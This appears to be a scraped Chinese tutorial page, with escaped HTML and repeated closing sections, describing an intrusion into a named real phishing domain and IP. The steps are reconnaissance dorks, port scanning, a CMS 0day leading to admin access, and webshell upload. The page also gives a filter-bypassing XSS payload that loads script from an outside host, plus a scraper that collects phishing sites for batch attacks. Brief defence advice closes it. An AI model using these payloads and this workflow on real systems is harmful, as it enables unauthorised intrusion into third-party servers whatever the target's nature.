钓鱼网站渗透实战教学文档<\/h1>

一、信息搜集阶段<\/h2>

1. 初始发现<\/h3>

钓鱼网站示例：http:\/\/mfnyongshihuigui.jiebao8.top<\/li>

主域名：jiebao8.top<\/li> <\/ul>

2. Google语法信息搜集<\/h3>

使用以下Google语法搜索潜在漏洞：<\/p>

目录遍历漏洞<\/strong><\/p>

site:jiebao8.top intitle:index.of
<\/code><\/pre>
<\/li>

配置文件泄露<\/strong><\/p>
site:jiebao8.top ext:xml | ext:conf | ext:cnf | ext:reg | ext:inf | ext:rdp | ext:cfg | ext:txt | ext:ora | ext:ini
<\/code><\/pre>
<\/li>

数据库文件泄露<\/strong><\/p>
site:jiebao8.top ext:sql | ext:dbf | ext:mdb
<\/code><\/pre>
<\/li>

日志文件泄露<\/strong><\/p>
site:jiebao8.top ext:log
<\/code><\/pre>
<\/li>

备份和历史文件<\/strong><\/p>
site:jiebao8.top ext:bkf | ext:bkp | ext:bak | ext:old | ext:backup
<\/code><\/pre>
<\/li>

SQL错误<\/strong><\/p>
site:jiebao8.top intext:"sql syntax near" | intext:"syntax error has occurred" | intext:"incorrect syntax near" | intext:"unexpected end of SQL command" | intext:"Warning: mysql_connect()" | intext:"Warning: mysql_query()" | intext:"Warning: pg_connect()"
<\/code><\/pre>
<\/li>

公开文件信息<\/strong><\/p>
site:jiebao8.top ext:doc | ext:docx | ext:odt | ext:pdf | ext:rtf | ext:sxw | ext:psw | ext:ppt | ext:pptx | ext:pps | ext:csv
<\/code><\/pre>
<\/li>

phpinfo()<\/strong><\/p>
site:jiebao8.top ext:php intitle:phpinfo "published by the PHP Group"
<\/code><\/pre>
<\/li>
<\/ol>
3. 威胁情报分析<\/h3>
使用微步在线分析域名：<\/p>
https:\/\/x.threatbook.cn\/domain\/mfnyongshihuigui.jiebao8.top
<\/code><\/pre>
发现：<\/p>

IP地址：162.247.96.114<\/li>
该IP下共有230个域名（异常数量，可能用于恶意目的）<\/li>
<\/ul>
4. 端口扫描<\/h3>
发现开放端口：<\/p>

21 (FTP)<\/li>
80 (HTTP)<\/li>
102 (SSH)<\/li>
3306 (MySQL)<\/li>
<\/ul>
5. CMS识别<\/h3>
使用云悉CMS识别工具：<\/p>
http:\/\/www.yunsee.cn\/
<\/code><\/pre>
识别结果为PCWAP CMS（小众CMS系统）<\/p>
二、渗透阶段<\/h2>
1. 利用已知0day漏洞<\/h3>

已知PCWAP CMS存在0day漏洞<\/li>
越权进入后台<\/li>
<\/ul>
2. 文件上传漏洞利用<\/h3>

修改文件上传类型，添加.php扩展名<\/li>
上传图片LOGO时，由于修改了上传类型，可直接上传webshell<\/li>
尝试上传：

大马<\/li>
小马<\/li>
一句话木马<\/li>
<\/ul>
<\/li>
<\/ol>
3. 提权尝试<\/h3>

尝试执行Linux命令失败（可能被禁止）<\/li>
打包所有源码进行后续分析<\/li>
<\/ul>
三、XSS漏洞挖掘与利用<\/h2>
1. 初始XSS测试<\/h3>

提交账号密码时抓包<\/li>
测试payload：
u=12312312&p=12312"><c>1&bianhao=1
<\/code><\/pre>

c标签成功执行，证明存在XSS漏洞<\/li>
<\/ul>
<\/li>
<\/ol>
2. 过滤机制分析<\/h3>
通过模糊测试发现过滤机制：<\/p>

过滤字符：a字符、onmouseover、onload等常见事件<\/li>
最大输入长度：32个字符<\/li>
过滤特殊字符：+, &#等<\/li>
允许的事件：onscroll, onfocus<\/li>
允许的标签：body, input, br, i<\/li>
Unicode编码未被过滤<\/li>
<\/ul>
3. 拆分跨站技术<\/h3>
由于限制严格，采用拆分跨站技术：<\/p>
攻击原理<\/strong>：<\/p>

构造一个函数，当鼠标滚轮移动时让所有元素获取焦点<\/li>
使用input标签启动onfocus函数<\/li>
分别加载XSS站点<\/li>
<\/ol>
攻击代码<\/strong>：<\/p>
<body<\/span> onscroll<\/span>=<\/span>$(`*`).focus()<\/span>> 1
<\/span><\/span><i<\/span> id<\/span>=<\/span>"i"<\/span>>$.getScript(`\/\/xs.tv`) 2
<\/span><\/span><input<\/span>\/<\/span>onfocus<\/span>=<\/span>s=$("i").text()<\/span>> 3
<\/span><\/span><input<\/span>\/<\/span>onfocus<\/span>=<\/span>ev\u0061l(s)<\/span>> 4
<\/span><\/span><br<\/span>><br<\/span>><br<\/span>><br<\/span>><br<\/span>><br<\/span>><br<\/span>><br<\/span>> 5
<\/span><\/span><\/code><\/pre>代码解释<\/strong>：<\/p>

当移动鼠标滑轮时触发$(<\/code>*).focus()<\/code>，使所有元素获得焦点<\/li>
i标签中包含要执行的JS代码（使用jQuery的getScript方法）<\/li>
第一个input获取焦点时，获取i标签中的内容<\/li>
第二个input获取焦点时，执行获取的JS代码<\/li>
多个br标签确保页面足够长，便于触发滚动事件<\/li>
<\/ol>
四、批量攻击钓鱼网站<\/h2>
1. 钓鱼网站识别<\/h3>
通过关键词搜索识别钓鱼网站：<\/p>

"幸运冒险家启航-心悦俱乐部官方网站-腾讯游戏"<\/li>
"老兵空降回归-绝地求生官方网站-腾讯游戏"<\/li>
<\/ul>
2. 批量采集脚本<\/h3>
import<\/span> requests
<\/span><\/span>from<\/span> bs4 import<\/span> BeautifulSoup
<\/span><\/span>import<\/span> urllib3
<\/span><\/span>urllib3.<\/span>disable_warnings(urllib3.<\/span>exceptions.<\/span>InsecureRequestWarning)
<\/span><\/span>
<\/span><\/span>headers =<\/span> {
<\/span><\/span>    "User-Agent"<\/span>: "Mozilla\/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko\/20100101 Firefox\/48.0"<\/span>,
<\/span><\/span>    'Accept-Language'<\/span>: 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3'<\/span>,
<\/span><\/span>    'Connection'<\/span>: 'keep-alive'<\/span>,
<\/span><\/span>    'Accept'<\/span>: 'text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8'<\/span>,
<\/span><\/span>    'X-Forwarded-For'<\/span>:'120.239.169.74'<\/span>
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>proxies =<\/span> {
<\/span><\/span>    "http"<\/span>:"http:\/\/127.0.0.1:8080"<\/span>,
<\/span><\/span>    "https"<\/span>:"https:\/\/127.0.0.1:8080"<\/span>,
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>for<\/span> i in<\/span> range(0<\/span>,200<\/span>,10<\/span>):
<\/span><\/span>    bd_search =<\/span> "https:\/\/www.baidu.com\/s?wd=幸运冒险家启航-心悦俱乐部官方网站-腾讯游戏&pn=<\/span>%s<\/span>"<\/span> %<\/span> str(i)
<\/span><\/span>    r =<\/span> requests.<\/span>get(bd_search, headers=<\/span>headers, verify=<\/span>False<\/span>, proxies=<\/span>proxies, timeout=<\/span>2<\/span>)
<\/span><\/span>    
<\/span><\/span>    with<\/span> open("1.html"<\/span>, "a+"<\/span>, encoding=<\/span>"utf-8"<\/span>) as<\/span> f:
<\/span><\/span>        f.<\/span>write(r.<\/span>text)
<\/span><\/span>    
<\/span><\/span>    soup =<\/span> BeautifulSoup(r.<\/span>text, "lxml"<\/span>)
<\/span><\/span>    url_list =<\/span> soup.<\/span>select(".t > a"<\/span>)
<\/span><\/span>    
<\/span><\/span>    for<\/span> url in<\/span> url_list:
<\/span><\/span>        real_url =<\/span> url['href'<\/span>]
<\/span><\/span>        try<\/span>:
<\/span><\/span>            r =<\/span> requests.<\/span>get(real_url, headers=<\/span>headers, verify=<\/span>False<\/span>, proxies=<\/span>proxies, timeout=<\/span>2<\/span>)
<\/span><\/span>            print(r.<\/span>url)
<\/span><\/span>            with<\/span> open("exp.txt"<\/span>, "a+"<\/span>, encoding=<\/span>"utf-8"<\/span>) as<\/span> f:
<\/span><\/span>                f.<\/span>write(r.<\/span>url+<\/span>"<\/span>\n<\/span>"<\/span>)
<\/span><\/span>        except<\/span> Exception<\/span> as<\/span> e:
<\/span><\/span>            print(e)
<\/span><\/span><\/code><\/pre>3. 批量渗透<\/h3>

编写专用脚本批量渗透钓鱼网站<\/li>
发现部分钓鱼网站每天可获取上百个账号密码<\/li>
<\/ul>
五、防御建议<\/h2>
1. 对网站管理员<\/h3>

及时更新CMS系统，修补已知漏洞<\/li>
严格限制文件上传类型<\/li>
实施输入过滤和输出编码<\/li>
限制单个IP的域名数量<\/li>
监控异常登录行为<\/li>
<\/ol>
2. 对普通用户<\/h3>

警惕非官方域名的"官方网站"<\/li>
不要在不同网站使用相同密码<\/li>
开启二次验证<\/li>
定期检查账号异常活动<\/li>
<\/ol>
六、总结<\/h2>
本案例展示了从信息搜集到实际渗透钓鱼网站的完整过程，重点介绍了在严格过滤条件下的XSS绕过技术。通过批量识别和渗透钓鱼网站，可以有效减少网络诈骗的发生。<\/p>

钓鱼网站渗透实战教学文档<\/h1>

一、信息搜集阶段<\/h2>

二、渗透阶段<\/h2>

三、XSS漏洞挖掘与利用<\/h2>

四、批量攻击钓鱼网站<\/h2>

五、防御建议<\/h2>

六、总结<\/h2> 本案例展示了从信息搜集到实际渗透钓鱼网站的完整过程，重点介绍了在严格过滤条件下的XSS绕过技术。通过批量识别和渗透钓鱼网站，可以有效减少网络诈骗的发生。<\/p>

六、总结<\/h2>
本案例展示了从信息搜集到实际渗透钓鱼网站的完整过程，重点介绍了在严格过滤条件下的XSS绕过技术。通过批量识别和渗透钓鱼网站，可以有效减少网络诈骗的发生。<\/p>